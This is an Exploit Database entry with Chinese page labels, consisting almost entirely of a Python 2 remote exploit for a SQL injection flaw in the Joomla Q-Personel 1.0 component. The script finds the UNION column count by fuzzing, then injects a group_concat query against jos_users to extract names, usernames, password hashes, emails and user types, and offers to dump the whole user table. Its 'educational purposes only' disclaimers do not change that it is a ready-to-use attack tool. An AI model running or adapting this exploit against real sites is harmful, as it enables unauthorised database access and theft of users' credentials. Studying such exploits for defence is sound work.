Joomla! Component Q-Personel 1.0 – SQL Injection

• Exploit Database
• 109 阅读

• 作者： Valentin Hoebel
  日期： 2010-05-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12723/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189

  #!/usr/bin/python   # Joomla com_qpersonel SQL Injection Remote Exploit # Version 1.0 (23th May 2010 (public release) # By Valentin Hoebel (valentin@xenuser.org) # ASCII FOR BREAKFAST # # EXPLOIT BASED ON MY COLUMN FUZZER # Fuzzer was enhanced so it serves as a Joomla Exploiter template # # About the Vulnerability: # ------------------------------------------------------------------------ # http://www.xenuser.org/documents/security/qpersonel_sql.txt # # About the Exploit: # ------------------------------------------------------------------------ # Exploits the SQL injection vulnerability I discovered # on 13th April 2010. # # Copy, modify, distribute and share the code as you like! # Warning: I am not responsible for any damage you might cause! # Exploit written for educational purposes only.   import sys,re,urllib,urllib2,string from urllib2 import Request, urlopen, URLError, HTTPError   # Define the max. amounts for trying max_columns = 100   # Prints usage def print_usage(): print "" print "=================================================================================" print " Joomla com_qpersonel SQL Injection Remote Exploit" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " Vulnerable URL example:" print " http://target/index.php?option=com_qpersonel&task=qpListele&katid=1" print "" print " Usage:" print " -u <URL> (e.g. -u \"http://target/index.php?option=com_qpersonel&task=qpListele&katid=1\")" print " --help (displays this text)" print "" print " Read the source code if you want to know more about this vulnerability." print " For educational purposes only! I am not responsible if you cause any damage!" print "" print "=================================================================================" print "" print "" return   #Prints banner def print_banner(): print "" print "=================================================================================" print "" print " Joomla com_qpersonel SQL Injection Remote Exploit" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " For educational purposes only! I am not responsible if you cause any damage!" print "" print "=================================================================================" print "" return   # Testing if URL is reachable, with error handling def test_url(): print ">> Checking if connection can be established..." try: response = urllib2.urlopen(provided_url)   except HTTPError,e: print ">> The connection could not be established." print ">> Error code: ",e.code print ">> Exiting now!" print "" sys.exit(1) except URLError,e: print ">> The connection could not be established." print ">> Reason: ",e.reason print ">> Exiting now!" print "" sys.exit(1) else: valid_target = 1 print ">> Connected to target! URL seems to be valid." print "" return   # Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities def find_columns(): # Define some important variables and make the script a little bit dynamic number_of_columns = 1 column_finder_url_string = "+AND+1=2+UNION+SELECT+" column_finder_url_message = "0x503077337220743020743368206330777321" column_finder_url_message_plain = "P0w3r t0 t3h c0ws!" column_finder_url_terminator = "+from+jos_users--" next_column = "," column_finder_url_sample = "group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)"   # Craft the final URL to check final_check_url = provided_url+column_finder_url_string+column_finder_url_message print ">> Trying to find the correct number of columns..."   for x in xrange(1, max_columns): # Visit website and store response source code of site final_check_url2 = final_check_url+column_finder_url_terminator response = urllib2.urlopen(final_check_url2) html = response.read() find_our_injected_string = re.findall(column_finder_url_message_plain, html)   # When the correct amount was found we display the information and exit if len(find_our_injected_string) != 0: print ">> Correct number of columns found!" print ">> Amount: ",number_of_columns # Craft our exploit query malicious_query =string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample) print "" print ">> Trying to fetch the first user of the Joomla user table..."   # Receive the first user of the Joomla user table response = urllib2.urlopen(malicious_query) html = response.read() get_secret_data = string.find(html,"P0w3r t0 t3h c0ws!") get_secret_data += 18 new_html = html[get_secret_data :] new_get_secret_data = string.find(new_html,"P0w3r t0 t3h c0ws!") new_html_2 = new_html[:new_get_secret_data] print "name, username, password, e-mail address and user status are shown" print new_html_2 print ""   # Offer to display all entries of the Joomla user table user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": print "" print "-------------------------------------------------------------" print new_html print "-------------------------------------------------------------" print "The seperator for the single entries is: ",column_finder_url_message_plain print "Bye!" print "" print "" sys.exit(1) else: print "Bye!" print "" print "" sys.exit(1)   # Increment counter var by one number_of_columns+= 1   #Add a new column to the URL final_check_url += next_column final_check_url += column_finder_url_message # If fuzzing is not successfull print this message print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?" print "Bye!" print "" print ""     # Checking if argument was provided if len(sys.argv) <=1: print_usage() sys.exit(1)   for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1)   # Checking ifURL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner()   # At first we test if we can actually reach the provided URL test_url()   # Now start with finding the correct amount of columns find_columns()   ### EOF ###